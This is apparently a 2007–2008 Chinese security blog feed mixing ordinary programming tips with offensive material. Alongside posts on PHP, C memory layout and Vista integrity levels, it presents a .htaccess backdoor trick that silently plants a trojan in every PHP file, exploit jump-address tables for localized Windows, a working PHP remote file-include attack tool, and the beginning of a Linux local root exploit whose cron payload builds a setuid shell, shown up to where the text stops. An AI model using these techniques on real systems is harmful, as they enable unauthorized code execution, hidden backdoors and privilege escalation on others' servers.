PHP博客-GaRY's Blog-随笔分类-Tips

php调用mysql存储过程返回结果集的处理

wofeiwo — Tue, 29 Jan 2008 07:15:00 GMT

最近开发一个项目,用到这个,记一下:

关键就是两点

1 define('CLIENT_MULTI_RESULTS', 131072);
2
3 $link = mysql_connect("127.0.0.1", "root", "",1,CLIENT_MULTI_RESULTS) or die("Could not connect: ".mysql_error());

下面就可以正常使用了，以下是例子程序。

1 php
2     define('CLIENT_MULTI_RESULTS', 131072);
3
4     $link = mysql_connect("127.0.0.1", "root", "",1,CLIENT_MULTI_RESULTS) or die("Could not connect: ".mysql_error());
5     mysql_select_db("vs") or die("Could not select database");
6 ?>
7
8 php
9         $result = mysql_query("call get_news_from_class_id(2)") or die("Query failed:" .mysql_error());
10         while($row = mysql_fetch_array($result, MYSQL_ASSOC))
11         {
12                 $line = '''.$row["url"].'\'>'.$row["title"].'('.$row["page_time"].')'.'r>';
14                 echo $line;
15                 printf("\n");
16
17         }
18         mysql_free_result($result);
19 ?>
20
21 php
22     mysql_close($link);
23 ?>

另外说个事,因为最近用的是FleaPHP这个框架进行开发的.设置了DSN的options发现没有作用,debug了一下发现问题出在FLEA::parseDSN函数中,代码如下:

1    function parseDSN($dsn)
2     {
3         if (is_array($dsn)) {
4             $dsn['host'] = isset($dsn['host']) ? $dsn['host'] : '';
5             $dsn['port'] = isset($dsn['port']) ? $dsn['port'] : '';
6             $dsn['login'] = isset($dsn['login']) ? $dsn['login'] : '';
7             $dsn['password'] = isset($dsn['password']) ? $dsn['password'] : '';
8             $dsn['database'] = isset($dsn['database']) ? $dsn['database'] : '';
9             $dsn['options'] = isset($dsn['options']) ? serialize($dsn['options']) : '';

这里多加了个serialize,不知道是开发人员手误还是咋的.

wofeiwo 2008-01-29 15:15 发表评论

通过 Windows 注册表修改 PHP 配置

wofeiwo — Tue, 25 Dec 2007 05:59:00 GMT

PHP手册,常看常新:)
记录一下,不错不错

在 Windows 下运行 PHP 时，可以用 Windows 注册表以目录为单位来修改配置。配置值存放于注册表项 HKLM\SOFTWARE\PHP\Per Directory Values 下面，子项对应于路径名。例如对于目录 c:\inetpub\wwwroot 的配置值会存放于 HKLM\SOFTWARE\PHP\Per Directory Values\c\inetpub\wwwroot 项下面。其中的设定对于任何位于此目录及其任何子目录的脚本都有效。项中的值的名称是 PHP 配置指令的名字，值的数据是字符串格式的指令值。值中的 PHP 常量不被解析。不过只有可修改范围是 PHP_INI_USER 的配置值可以用此方法设定，PHP_INI_PERDIR 的值就不行。

另外,php.ini的位置可以通过 HKEY_LOCAL_MACHINE\SOFTWARE\PHP\IniFilePath（Windows 注册表位置）设置.优先级高于位于系统目录下和php目录下的php.ini文件

wofeiwo 2007-12-25 13:59 发表评论

.htaccess后门

wofeiwo — Tue, 25 Dec 2007 05:44:00 GMT

PHP手册,常看常新:)

PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置.
恰好,找到两个邪恶的属性:

auto_prepend_file string 指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来，因此会使用 include_path。特殊值 none 禁止了自动前缀。 auto_append_file string 指定在主文件之后自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来，因此会使用 include_path。特殊值 none 禁止了自动后缀。 Note: 如果脚本通过 exit() 终止，则自动后缀不会发生。于是很简单,利用.htaccess就能包含文件,并且不用修改任何对方的php文件,同目录下所有php文件就被植入木马了.管理员不注意的话可能就被忽略掉. 本地测试了一下,写了个.htaccess文件到我的sphpblog目录中.

.htaccess

然后随意访问一下sphpblog中的任意文件.

当然直接包含.haccess文件太明显了,上面一对无关和出错信息会出卖你的后门的.我这里只是PoC,要包含什么就随便各位了.
哦,还有一点,会很方便:

include_path ".;/path/to/php/pear" PHP_INI_ALL

什么意思我就不说了.各位自己琢磨吧,呵呵

wofeiwo 2007-12-25 13:44 发表评论

Eioffice tips

wofeiwo — Thu, 06 Sep 2007 07:21:00 GMT

前几天我的永中Office突然崩了，后来才明白是它不支持桌面效果。永中公司的技术员给我回邮件说，如果想要用桌面效果，目前解决的方法是先关闭特效，然后编辑/usr/bin/eio，在"#!/bin/sh"下增加一行,写入："export AWT_TOOLKIT=MToolkit"。

wofeiwo 2007-09-06 15:21 发表评论

转两个tips

wofeiwo — Sat, 11 Aug 2007 09:58:00 GMT

char[]于char*的区别

见程序如下：

#include "stdafx.h"
#include "string.h"
#include "stdio.h"
int main(int argc, char* argv[])
{
     char source[]="This is a source sentence";
    //char *source="This is a source sentence";
   strtok(source,"a");
   printf("%s\n",source);
    return 0;
}

如果用被注释掉的那句话，程序运行的时候就报错。

发现问题并找到参考资料如下：
首先要搞清楚编译程序占用的内存的分区形式：

一、预备知识—程序的内存分配
一个由c/C++编译的程序占用的内存分为以下几个部分
1、栈区（stack）—由编译器自动分配释放，存放函数的参数值，局部变量的值等。其操作方式类似于数据结构中的栈。
2、堆区（heap）—一般由程序员分配释放，若程序员不释放，程序结束时可能由OS回收。注意它与数据结构中的堆是两回事，分配方式倒是类似于链表。
3、全局区（静态区）（static）—全局变量和静态变量的存储是放在一块的，初始化的全局变量和静态变量在一块区域，未初始化的全局变量和未初始化的静态变量在相邻的另一块区域。程序结束后由系统释放。
4、文字常量区—常量字符串就是放在这里的。程序结束后由系统释放。
5、程序代码区

//main.cpp
int a=0;    //全局初始化区
char *p1;   //全局未初始化区
main()
{
   int b;栈
   char s[]="abc";   //栈
   char *p2;         //栈
   char *p3="123456";   //123456\0在常量区，p3在栈上。
   static int c=0；   //全局（静态）初始化区
   p1 = (char*)malloc(10);
   p2 = (char*)malloc(20);   //分配得来得10和20字节的区域就在堆区。
   strcpy(p1,"123456");   //123456\0放在常量区，编译器可能会将它与p3所向"123456"优化成一个地方。
}
二、堆和栈的理论知识
2.1申请方式
stack:
由系统自动分配。例如，声明在函数中一个局部变量int b;系统自动在栈中为b开辟空间
heap:
需要程序员自己申请，并指明大小，在c中malloc函数
如p1=(char*)malloc(10);
在C++中用new运算符
如p2=new char[10];
但是注意p1、p2本身是在栈中的。
2.2申请后系统的响应
栈：只要栈的剩余空间大于所申请空间，系统将为程序提供内存，否则将报异常提示栈溢出。
堆：首先应该知道操作系统有一个记录空闲内存地址的链表，当系统收到程序的申请时，会遍历该链表，寻找第一个空间大于所申请空间的堆结点，然后将该结点从空闲结点链表中删除，并将该结点的空间分配给程序，另外，对于大多数系统，会在这块内存空间中的首地址处记录本次分配的大小，这样，代码中的delete语句才能正确的释放本内存空间。另外，由于找到的堆结点的大小不一定正好等于申请的大小，系统会自动的将多余的那部分重新放入空闲链表中。
2.3申请大小的限制
栈：在Windows下,栈是向低地址扩展的数据结构，是一块连续的内存的区域。这句话的意思是栈顶的地址和栈的最大容量是系统预先规定好的，在 WINDOWS下，栈的大小是2M（也有的说是1M，总之是一个编译时就确定的常数），如果申请的空间超过栈的剩余空间时，将提示overflow。因此，能从栈获得的空间较小。
堆：堆是向高地址扩展的数据结构，是不连续的内存区域。这是由于系统是用链表来存储的空闲内存地址的，自然是不连续的，而链表的遍历方向是由低地址向高地址。堆的大小受限于计算机系统中有效的虚拟内存。由此可见，堆获得的空间比较灵活，也比较大。
2.4申请效率的比较：
栈:由系统自动分配，速度较快。但程序员是无法控制的。
堆:是由new分配的内存，一般速度比较慢，而且容易产生内存碎片,不过用起来最方便.
另外，在WINDOWS下，最好的方式是用Virtual Alloc分配内存，他不是在堆，也不是在栈,而是直接在进程的地址空间中保留一块内存，虽然用起来最不方便。但是速度快，也最灵活。
2.5堆和栈中的存储内容
栈：在函数调用时，第一个进栈的是主函数中后的下一条指令（函数调用语句的下一条可执行语句）的地址，然后是函数的各个参数，在大多数的C编译器中，参数是由右往左入栈的，然后是函数中的局部变量。注意静态变量是不入栈的。
当本次函数调用结束后，局部变量先出栈，然后是参数，最后栈顶指针指向最开始存的地址，也就是主函数中的下一条指令，程序由该点继续运行。
堆：一般是在堆的头部用一个字节存放堆的大小。堆中的具体内容由程序员安排。
2.6存取效率的比较
char s1[]="aaaaaaaaaaaaaaa";
char *s2="bbbbbbbbbbbbbbbbb";
aaaaaaaaaaa是在运行时刻赋值的；
而bbbbbbbbbbb是在编译时就确定的；
但是，在以后的存取中，在栈上的数组比指针所指向的字符串(例如堆)快。
比如：
void main()
{
char a=1;
char c[]="1234567890";
char *p="1234567890";
a = c[1];
a = p[1];
return;
}
对应的汇编代码
10:a=c[1];
004010678A4DF1 mov cl,byte ptr[ebp-0Fh]
0040106A884DFC mov byte ptr[ebp-4],cl
11:a=p[1];
0040106D8B55EC mov edx,dword ptr[ebp-14h]
004010708A4201 mov al,byte ptr[edx+1]
004010738845FC mov byte ptr[ebp-4],al
第一种在读取时直接就把字符串中的元素读到寄存器cl中，而第二种则要先把指针值读到edx中，再根据edx读取字符，显然慢了。
2.7小结：
堆和栈的区别可以用如下的比喻来看出：
使用栈就象我们去饭馆里吃饭，只管点菜（发出申请）、付钱、和吃（使用），吃饱了就走，不必理会切菜、洗菜等准备工作和洗碗、刷锅等扫尾工作，他的好处是快捷，但是自由度小。
使用堆就象是自己动手做喜欢吃的菜肴，比较麻烦，但是比较符合自己的口味，而且自由度大。

自我总结：
char *c1 = "abc";实际上先是在文字常量区分配了一块内存放"abc",然后在栈上分配一地址给c1并指向这块地址，然后改变常量"abc"自然会崩溃

然而char c2[] = "abc",实际上abc分配内存的地方和上者并不一样，可以从
4199056
2293624 看出，完全是两块地方，推断4199056处于常量区，而2293624处于栈区

2293628
2293624
2293620 这段输出看出三个指针分配的区域为栈区，而且是从高地址到低地址

2293620 4199056 abc 看出编译器将c3优化指向常量区的"abc"

继续思考：
代码：
#include
#include

main()
{
   char *c1 = "abc";
   char c2[] = "abc";
   char *c3 = (char* )malloc(3);
   // *c3 = "abc" //error
   strcpy(c3,"abc");
   c3[0] = 'g';
   printf("%d %d %s\n",&c1,c1,c1);
   printf("%d %d %s\n",&c2,c2,c2);
   printf("%d %d %s\n",&c3,c3,c3);
   getchar();
}
输出：
2293628 4199056 abc
2293624 2293624 abc
2293620 4012976 gbc
写成注释那样，后面改动就会崩溃
可见strcpy(c3,"abc");abc是另一块地方分配的，而且可以改变，和上面的参考文档说法有些不一定，而且我不能断定4012976是哪个区的，可能要通过算区的长度，希望高人继续深入解释，谢谢

[Tips]一些opcodes

by axis
2007-03-28
http://www.ph4nt0m.org

近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址，但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址，所以费了点时间收集了下，在这里要感谢傲少提供的机器给我去找地址。现在贴到这里，方便大家。

简体中文windows的通用跳转地址：(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
0x7ffa6773 push ebx,retn \x53\xc3 (0x7ffa6772 是 pop edx)
0x7ffd1769 -- 0x7ffd1779 jmp eax \xff\xe0
0x7ffc01b0 pop esi,retn \x5e\xc3
0x7ffa54cf 0x7ffaf780 jmp edx \xff\xe2

7FFA1571 58 POP EAX
7FFA1572 BF 58C058C2 MOV EDI,C258C058
7FFA1577 58 POP EAX
7FFA1578 C3 RETN

韩文版windows 2003 sp1上的 KR
kr 2k3 sp1
71ab1346 call eax ws2_32.dll
71ab4340 jmp eax ws2_32.dll
71ac273f call ecx ws2_32.dll
71ab6e3b jmp ecx ws2_32.dll
71ab5fb0 call ebx ws2_32.dll
71ab596b call esi ws2_32.dll
71ab5503 call edi ws2_32.dll
71ab5f62 pop edi, pop esi retn ws2_32.dll

可能是韩文版windows通用地址的（需确认） KR
7ffa6d56 call eax
7ffa78aa call edx
7ffa7306 call ecx
7ffa901a call ebx
7ffa4a1b jmp ebx
7ffa82a4 call esp
7ffa8b3c call esi
7ffa49d7 jmp esi

jp 2003 sp1 r2
日文 windows 2003 r2 SP1

7c999c86 call ebx ntdll.dll
7c9a96aa call ebx ntdll.dll
7c9b2c62 call ebx ntdll.dll
7c9834a3 jmp ebx ntdll.dll

7c9d1d1e jmp esp ntdll.dll
7c9585fb call eax ntdll.dll
7c99c6cb jmp eax ntdll.dll

7c95139e pop esi,pop ebp,retn ntdll.dll

7c951bc2 call ecx ntdll.dll
7c9c27bb call edx ntdll.dll
7c9523d7 call edi ntdll.dll
7c96a3c3 call esi ntdll.dll

71aa596b call edi ws2_32.dll
71aa5503 call edi ws2_32.dll
71aa5fb0 call ebx ws2_32.dll
71aa1346 call eax ws2_32.dll
71aa4340 jmp eax ws2_32.dll
71aa596b call esi ws2_32.dll
71aa5f62 pop edi,pop esi,retn ws2_32.dll

win tw 繁体中文windows通用地址(至少2k3 sp1)
7ffa2186 jmp ebx
7ffd1987 call eax (2k3 tw)
7ffaf9a8 jmp eax
7ffa46ad jmp ecx
7ffafffa jmp edx
7ffa24ce jmp esp
7ffa2b64 jmp esi
7ffa2eac jmp edi

71b75fb0 call ebx ws2_32.dll

wofeiwo 2007-08-11 17:58 发表评论

[zt]detours， x86 kernel hook 以及 x64 kernel hook

wofeiwo — Tue, 10 Jul 2007 16:54:00 GMT

我假设读者已经非常熟悉detours，阅读此文只是为了增强对detours的理解以及为了实现x64 hook。有关detours原理部分不再多讲。

X86 Kernel Hook
早些年，我把detours1.5移植到x86核心层，工作的不错，我一直用它来hook系统一些内部函数，有时候也用来hook IoCreateFile这类导出函数。让detours1.5在核心工作稳定并不是一件困难的事情。可能有些c/c++的麻烦，但是很快就可以解决。唯一需要注意的地方是detours1.5用VirtualProtect来让内存READ_WRITE_EXECUTE，在核心层有2种方法，第一种是群众所喜闻乐见的清除cr0，第二种是在核心层通过调用native api做VirtualProtect的事情。
detours的方法对比import/export方法有一些很明显的好处，其最大的好处是可以用来hook内部函数。而且由于hook的方法是直接修改函数体，所以不管调用者怎么玩花样，都很难绕过hook。
detours的缺点主要如下：
1，detours x86无法hook小于5字节的函数
2，detours x86需要一个完备的反汇编器和解释器，实际上detours代码中并不包含这个，因此，如果需要写一个函数阻止他人hook，可以这么写：
proc near
xor eax,eax
jeax 1
int 3
... // do something
proc end
注意到这里的这个jmp，因为eax肯定为0，所以该int3不会被调用，而被detours过的代码则很可能走到int3上去了，为了让detours的代码不走到int3，detours必须能够解析出前面3行代码的意思，并且修正jeax 1为jeax 1+(trampoline-function)。用类似的技术，也可以欺骗detours。
3，detours x86无法处理如下函数：
proc near
flag: ... // 函数前5个字节
.... //do something
jmp flag
.... // do something
proc end
该函数执行体中有一个jmp，跳到前5个字节。可是被detours过之后，该函数的前5个字节被修改了，而且改成了jmp trampoline。为了能够让detours可以处理此操作，必须反汇编解析整个函数体，用2种所描述的方法修改jmp flag。

综上述，detours思路很好，但是存在缺陷，要搞定这些缺陷，需要完整反汇编器。

X64 Kernel Hook
最近有一个需求要在x64下实现类似的hook模块，我找到了detours2.1，给MS发了email，MS的答复是，包含64bit的detours2.1，需要10000 USD。
于是我就删掉了MS的email，开始自己动手来做这个事情了。我大致说一下原理和需要注意的地方。

x64 hook和x86 hook的原理相似，都是修改原函数的首地址。不同的是，x64下不存在
jmp 64_address这种指令，x86下要跨4G跳转，必须是jmp [64_address]，对应的汇编码不再是e9 xxxxxxxx，而是ff15 [xxxxxxxx]，其中xxxxxxxx保存的是一个64_address。注意xxxxxxxx依然是32位，所以，该内存也必须和function处于同一个4G。

这个限制对于普通的代码编译来说，并不存在太大的问题，因为很少有exe超过4G的。所以编译器生成的代码依然使用e9 xxxxxxxx。对于import的dll来说，通常都是call [xxxxxxxx]，以前是这样，现在还是这样，不同的是，[xxxxxxxx]以前指向32位的地址，现在指向64位的地址。这样一来，dll加载的位置和exe所在的位置不在同一个4G也没有关系了。

对于detours来说，受上面所述特性影响的是，trampoline通常位于heap memory/nonpaged pool，new_function位于我们自己所写代码的dll/driver中，old_function位于我们所需要hook的那个模块中。这里面存在一个基本矛盾是，new_function通常和old_function分别处于2个不同dll或者.sys中，系统很可能把他们加载到了距离很远的空间中，也即abs(new_function-old_function)>4G。这样一来，就无法使用e9 xxxxxxxx，而必须使用ff15 [xxxxxxxx]了，而且xxxxxxxx是一个32的偏移，所以[xxxxxxxx]还不能位于我们的dll/sys中。

根据以上的分析，最后可以得出如下算法：
1，找到需要hook的函数地址
2，解析从函数起始地址开始，至少6+8=14个字节的代码。代码不能断开。以上2个过程和detourx86一样，不同的是，detoursx86之需要e9 xxxxxxxx，也就是说只需要5个字节，而我们必须用ff15 [xxxxxxxx]。如果函数体小于14个字节，这意味着该函书无法detours。
不过函数体小于14字节多半是因为里面执行了一个call或者jmp，那么解析该代码，把函数起始地址设置为jmp之后的地址，重新进行2过程。
3，把这14或者15，16...个字节拷贝到预先分配的一块内存中，我们叫它trampoline。
4，把前6个字节改为ff15 [0]，也即ff15 00000000
5，在随后的8个字节中保存new_function的起始地址
6，修正trampoline中的14字节的代码，如果里面有jmp，call等跳转语句，修改偏移量，这时候通常又需要跨4G的跳转，那么按照上面的方法修改之，trampoline的字节数可能会增加。
7，在trampoline的代码之后，插入ff15 [0]，并且在随后的8个字节中填充old_function+14。

trampoline可以预先分配一个100字节的buffer，初始化全部填充为nop，在进行7的时候，可以从trampoline的底部，也即100-14的位置开始填入ff,15,00,00,00,00, 64_bit_old_function+14(15,16...)。

以上算法的缺点和x86 detours的缺点一样，第一条为无法hook函数体小于14字节的函数。

14个字节相当大，有时候这个缺陷不可忍受，为此，介绍一种更为肮脏的手段。

代码加载到内存中时，通常有很多废空间，也即，在这些空间中，只有nop，或者永远不会执行。用IDA可以找到这些空间。如果能够找到足够大到，以至于可以保存一个64位地址的空间的话，那么可以只修改前5个字节为jmp [xxxxxxxx]，同时只拷贝5个字节到trampoline。trampoline的底部14个字节照旧。

以上就是x64下的detours过程。

有一个x64下需要注意的问题，vc8不支持x64下的_asm关键字，所以
_asm{
cli
mov eax,cr0
and eax,not 1000h
mov cr0,eax }不能再用
取而代之的是
_disable();
uint64 cr0=__readcr0();
cr0 &= 0xfffffffffffeffff;
__writecr0(cr0);
当然还可以继续用native api，不过以上方法简洁而且为广大群众所喜闻乐见。有关于_disable等函数，请查阅新版msdn。

至于IA64，我对此一无所知。

顺便说几点：
1，EM64T的cpu上可以run win64os，但是，不知为何，vmware无法在EM64T的cpu上install/run win64os。而amd64 cpu上即便安装的是win32 os，也可以在其上的vmware里install/run win64os。
2，softice已经停止开发，而且不支持x64，只有virtual模式才支持。鉴于其已经停止开发，建议大家都使用windbg。
3，idapro 5.0反汇编x64的代码，错误百出，一团乱麻，基本上需要先U再C。

因为14字节的限制太大，以至于始终觉得不爽。后来想到了一个解决方案。

假设原函数是old_func，新函数是new_func，那么分配trampoline的时候，用某些技术方法，限定分配出的内存和old_func在同一个4G。可以通过VirtualAlloc实现，具体方法可以是多次改变第一个参数，调用VirtualAlloc，直到返回值不为NULL为止。

这样一来，detours的逻辑改变为：

1，首先把old_func的前5个字节拷贝到trampoline+14，然后修改为jmp offset，也即e9 trampoline-5-old
2，trampoline的前6字节为ff15 [0],接下来的8个字节为new_func_address
3，trampoline+14+5之后的5个字节为jmp (trampoline+14+5+5 - (old_func_addr+5))

这样调用old的时候，会首先执行jmp offset到trampoline，trampoline又jmp到了new_func，new_func调用old的时候，会直接跳到trampoline+14处，执行原来的前5个字节，然后再jmp会原函数体。

如此，一切都完美了 :)

wofeiwo 2007-07-11 00:54 发表评论

[zt]Windows Vista有趣的标签SID

wofeiwo — Fri, 01 Jun 2007 14:48:00 GMT

文章来源：http://blogs.itecn.net/blogs/ahpeng

Label SID，盆盆将其翻译为标签SID，诸君别嫌土啊。这个东东是Windows Vista新引入的一个安全主体。在Mark Russinovich的博客文章《Windows Vista用户帐户控制、PsExec和安全边界》中，我们知道在Windows Vista，进程和资源对象都划分等级的（完整性级别）。等级低的进程不够资格写入等级高的资源对象，哪怕访问控制列表（ACL）允许也不行。

盆盆评述在拙作《Windows Vista IE保护模式深入剖析》中做过一个形象的比喻。在Windows Vista中，安全机制有了很大的改进，不仅仅看ACL。这就好比男女双方求爱，除了看对方的经济收入等条件(相当于ACL)，还要看是否门当户对(相当于完整性级别)。

看了Mark Russinovich的文章，想必您已经知道如何查看和设置资源对象的完整性级别（可以用icacls或者AccessChk命令）。

那么进程呢？Mark的文章里没提到，相信您已经知道，就是所谓的标签SID，呵呵，太有才了:)

标签SID的实质

标签SID位于进程的访问令牌里，用来标识进程的完整性级别。进程要访问资源对象（例如某个文件夹）时，就亮出它的访问令牌。文件夹就会检查令牌里的标签SID，看看级别是否足够。如果级别比自己还低，对不起，您只能读取，不能写入。

可以用Process Explorer查看进程的访问令牌，从而查看某个进程的标签SID。附图就是一个进程的访问令牌。其中红色部分显示其标签SID是“Mandatory Label\Medium Mandatory Level”，表明该进程的完整性级别为“中级”。蓝色部分显示该进程并不拥有管理员的运行身份（Administrators标记为Deny），同时只有五个特权。

完全可以想像，如果进程的完整性级别是高级（标签SID为Mandatory Label\High Mandatory Level），该进程应该拥有管理员的运行身份（Administrators标记为Owner），同时拥有约24个特权。

和Linux的对比

利用完整性级别这样的安全机制，Windows Vista就可以获得更高的安全。这样的机制类似于开源的MAC机制，例如Red Hat的SELinux。两者总体上各有千秋，但是窃以为比SELinux更加灵活，对用户的干扰也要小的多。在MAC下，用户有时候必须自己定义进程和资源的“类型”，否则进程工作可能会不正常。更具体的对比，可以参考盆盆回复在远景上的帖子（该贴已经有2万6千个访问量，寒一个～）

标签SID的其他作用

标签SID除了可以判断进程的访问权限外。还可以用来帮助决策UAC是否弹出权限提升对话框，这点在Mark的文章里没有提到。

默认情况下，如果某个进程需要管理员特权，则系统会查看其父进程的标签SID，如果是“中级”，则会弹出权限提升对话框。如果是“高级”，则不会弹出对话框（直接继承父进程的安全上下文）。

盆盆评述有关这一点，盆盆在06年3月份的文章《Windows Vista的UAC功能浅析(二)》曾经做过这样的猜测，现在得到实验的证实。

由于绝大多数用户进程的父进程是Explorer，其标签SID为“中级”，所以会弹出权限提升对话框。

以管理员身份打开“命令提示符”窗口，然后再在其下运行需要管理员特权的进程，这时候不会弹出权限提升对话框。因为父进程cmd.exe的标签SID是“高级”。

有趣的特例

我们可以做一个实验，来欺骗Windows Vista的安全机制。在Process Explorer里单击File→Run as Limited User，然后在打开的对话框里输入“CMD”并回车，如附图所示。

这时候会弹出一个很“另类”的命令提示符窗口。该命令提示符进程的标签SID是“高级”，但是实际上却是标准用户权限。不信？且看其访问令牌：

在红色部分我们可以看到，其标签SID是“Mandatory Label\High Mandatory Level”（完整性级别为“高级”），但是却并不拥有管理员的运行身份（Administrators标记为Deny），同时只有五个特权（查看蓝色部分）。

在这个“另类”的命令提示符下运行某个需要管理员特权的任务，例如“服务”管理单元，会发生什么情况？

系统根本不会弹出提升权限对话框，直接启动“服务”管理单元。这是因为UAC系统会根据父进程的标签SID来判定是否需要弹出权限提升对话框。

但是打开的这个“服务”管理单元也一样“另类”，Windows显然已经认为这是一个管理员进程（因为其标签SID为高级），但是实际上只有标准用户权限，我们什么操作几乎都不能做。

安全影响

Windows Vista的UAC只根据父进程的标签SID来判断是否应该提升权限，看上去似乎有点弱智。但是实际上由于这种操作的可能性很低，所以影响很小。

还有一个需要有趣的地方是，这种“另类”的进程虽然只有标准用户权限，但是完整性级别却是“高级”，所以这些进程可以通过代码注入等手段获取管理员权限，这和Windows 2000/XP的情况是一致的。

不过攻击者想要利用这种方法绕开UAC的限制，几乎是不可能的，因为构建这样的访问令牌，本身需要管理员特权。所以用户大可不必担心。

盆盆评述 05年11月，当时盆盆刚接触Windows Vista不久，写过一篇文章《Windows Vista的UAC功能浅析(一)》，就猜测“古怪帐户”的作用，应该是用来标识进程的等级。这里的“古怪帐户”，实际上就是本文所说的标签SID。

wofeiwo 2007-06-01 22:48 发表评论

Ring3 Inline Hook Demo

wofeiwo — Tue, 29 May 2007 05:45:00 GMT

第一次写这种内存补丁一样的东西.开始怎么写都出错.字节码没有对齐..跳转地址算错.等等...后来用ida分析+od调试搞定.(头一次认认真真用od和ida...值得纪念)
测试环境xp sp2+vc6.0

#include <stdio.h>
#include <windows.h>

// 保存原始的5个字节代码,注意一定要保证完整
BYTE orig_code[5] = {0x90, 0x90, 0x90, 0x90, 0x90};
// JMP 0xXXXXXXXX
BYTE hook_code[5] = { 0xe9, 0, 0, 0, 0 };
BYTE jmp_orig_code[5] = { 0xe9, 0, 0, 0, 0};

int func();
int fake_func();
void hook_func();
int jmp_back();

int main(int argc, char **argv)
{
    int ret;
    hook_func();
    ret = func();
    return ret;
}

int func()
{
    printf("I'm func(),I'm called!\r\n");
    return 0;
}

void hook_func()
{
    DWORD dwOldProtect;
    if(!VirtualProtect(func, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect))
    {
        printf("VirtualProtect error!\r\n");
        return;
    }
    if(!VirtualProtect(jmp_back, 12, PAGE_EXECUTE_READWRITE, &dwOldProtect))
    {
        printf("VirtualProtect error!\r\n");
        return;
    }

    // 保存原始操作码
    memcpy(orig_code, (BYTE *)func, 5);
    // 计算fack_func地址
    *((ULONG*)(hook_code+1) ) = (ULONG)fake_func - (ULONG)func - 5;
    // 修改原始入口
    memcpy((BYTE *)func, hook_code, 5);
    // 计算跳回地址
    *( (ULONG*)(jmp_orig_code+1) ) = (ULONG)func - (ULONG)jmp_back -5;
    // 填充jmp_back
    memcpy((BYTE *)jmp_back, orig_code, 5);
    memcpy((BYTE *)jmp_back+5, jmp_orig_code, 5);
}

__declspec(naked) int jmp_back()
{
    __asm
    {
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
    }
}

int fake_func()
{
    int ret;
    printf("I'm fake_func(),I'm called!\r\n");
    ret = jmp_back();
    return ret;
}

测试结果:

参考: http://www.whitecell.org/forums/viewthread.php?tid=360

wofeiwo 2007-05-29 13:45 发表评论

小东西

wofeiwo — Tue, 22 May 2007 08:12:00 GMT

翻找以前的东西.找到以前写的一些小东西,自己都不记得了....
呵呵,丢上来,都是些没有技术含量的玩意

Remote Include File 的exp,利用的是php://input,所以要求对方php起码要有4.3.0版本以上:

php
/*
*
* PHP include file exploit
* Modified by wofeiwo
* Date: Jun 24th 2006
*
*/

function stripslashes_array(&$array) {
while (list($key,$var) = each($array)) {
  if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
   if (is_string($var)) {
    $array[$key] = stripslashes($var);
   }
   if (is_array($var))  {
    $array[$key] = stripslashes_array($var);
   }
  }
}
return $array;
}

if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
    $_POST = stripslashes_array($_POST);
}

$server=isset($_POST['server'])?$_POST['server']:"";
$file=isset($_POST['file'])?$_POST['file']:"";
$iszero=isset($_POST['iszero'])?"checked":"";
$cmd=isset($_POST['cmd'])?$_POST['cmd']:"";
?>

<style>
body {font-family : sans-serif;background-color: #ffffff; color: #000000;}
b {font-family : Courier New, sans-serif;font-size : 24px;}
.center {text-align: center;}
input {
        font-family: "Verdana";
        font-size: "10px";
        BACKGROUND-COLOR: "#FFFFFF";
        height: "18px";
        border: "2px solid #666666";
}
style>

<center><b>PHP include file exploitb><br><font size="2px">Notice: this exploit cannot be used while target is below PHP 4.3.0font>center><br><br>
<form action="" method="post" >
target server : <br>
<input type="text" name="server" value=""><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") :<br>
<input type="text" name="file" value=""><br>
add "%00": <input type="checkbox" $iszero?> name="iszero"><br><br>
exec (enclose php commands between <? .. ?> tags):<br>
<input type="text" name="cmd" value="" ><br><br>
<INPUT type="submit" value="send">
form>

php
if(isset($_POST['cmd']))
{
$zerochar = $iszero == "checked"?"%00":"";
$message  = "POST /".$file."php://input".$zerochar." HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "

";
while(!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="

";
echo $resp;
}
?>

这个是当时linux kernel PRCTL loacl poc,刚出来的时候我换了个shellcode,后来这个exp出了4个版本,各个都比我的好:)

/********************************************************/
/* Local r00t Exploit for:                              */
/* Linux Kernel PRCTL Core Dump Handling                */
/* Modified by wofeiwo [13.Jul.2006] (chage shellcode)  */
/*------------------------------------------------------*/
/* Based on:                                            */
/*------------------------------------------------------*/
/* By:                                                  */
/* - dreyer       (main PoC code)      */
/* - RoMaNSoFt  (local root code)    */
/*                                  [ 10.Jul.2006 ]     */
/********************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   echo -e \"#include \\nint main(){\\nsetuid(0);setgid(0);setreuid(0);system(\\\"/bin/sh\\\");return 0;\\n}\\n\" > /tmp/fakesh.c;gcc -o /tmp/fakesh /tmp/fakesh.c;chmod +s /tmp/fakesh;rm -f /tmp/fakesh.c;/tmp/fakesh;rm -f /etc/cron.d/core\n";

int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
